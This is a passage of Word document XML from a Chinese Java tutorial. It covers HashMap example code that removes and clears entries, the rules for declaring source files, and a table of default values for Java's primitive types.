      <w:r>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B653B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.util.HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20876B31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0627F9DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class RunoobTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A95C91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50F2E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82712A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        HashMap&lt;Integer, String&gt; Sites = new HashMap&lt;Integer, String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3C206A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>添加键值对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B45946" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(1, "Google");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD1B94D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(2, "Runoob");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBECE50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(3, "Taobao");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD98F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(4, "Zhihu");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E24DFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Sites.remove(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD6D253" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(Sites);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FBE2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763FA048" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F4E57E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除所有键值对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B14C5A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EF57F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import java.util.HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E3D01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38471187" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class RunoobTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19782A6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32009541" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6AA98A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        HashMap&lt;Integer, String&gt; Sites = new HashMap&lt;Integer, String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7058D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>添加键值对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109CB3B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Sites.put(1, "Google");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A71D83" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(2, "Runoob");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342426F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(3, "Taobao");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F7E603" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Sites.put(4, "Zhihu");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663FECD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Sites.clear();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6DAF39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println(Sites);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E8039C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF52B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2074DE32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源文件声明规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7CE1FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>一个源文件中只能有一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> public </w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F62E67" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>一个源文件可以有多个非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> public </w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F058E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>源文件的名称应该和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> public </w:t>
      </w:r>
      <w:r>
        <w:t>类的类名保持一致。例如：源文件中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> public </w:t>
      </w:r>
      <w:r>
        <w:t>类的类名是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Employee</w:t>
      </w:r>
      <w:r>
        <w:t>，那么源文件应该命名为</w:t>
      </w:r>
      <w:r>
        <w:t>Employee.java</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A64CDC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>如果一个类定义在某个包中，那么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package </w:t>
      </w:r>
      <w:r>
        <w:t>语句应该在源文件的首行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18377083" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>如果源文件包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:r>
        <w:t>语句，那么应该放在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package </w:t>
      </w:r>
      <w:r>
        <w:t>语句和类定义之间。如果没有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package </w:t>
      </w:r>
      <w:r>
        <w:t>语句，那么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:r>
        <w:t>语句应该在源文件中最前面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E418EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:t>语句和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package </w:t>
      </w:r>
      <w:r>
        <w:t>语句对源文件中定义的所有类都有效。在同一源文件中，不能给不同的类不同的包声明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469CEC94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2CB140" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有两大数据类型：内置数据类型、引用数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698A2AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28A5395D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两大数据类型：内置数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659663F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中数字类型（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个整数型、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个浮点型），一种字符类型，一种布尔型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55853FD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EED76B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCB2C8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09788FF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137A46F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAC2EE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8F77FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FAB6F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A1951" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBA0E5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C6131A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有另外一种基本类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java.lang.Void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是无法对他进行操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D795F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A06C63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认值：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5959" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4277"/>
        <w:gridCol w:w="1682"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C452C" w14:paraId="47F308DB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="180"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="456AD507" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>数据类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E7B36D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>默认值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="41181728" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="274"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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51A788FB"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byte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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233EF3B4"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="4B8BFE70" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="274"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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543D4068"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short</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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4CDCBEAE"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="0AD1C1AE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="274"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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54ACF7BC"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int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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0AA8DA77"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="780B6BFD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="274"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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2BFFD766"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long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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10F73DD2"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0L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="1494224A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="274"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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693ACCC8"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float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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0FCF08E0"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0.0f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="5EC23F44" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="274"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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11F42B1B"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double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5F266374"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0.0d</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
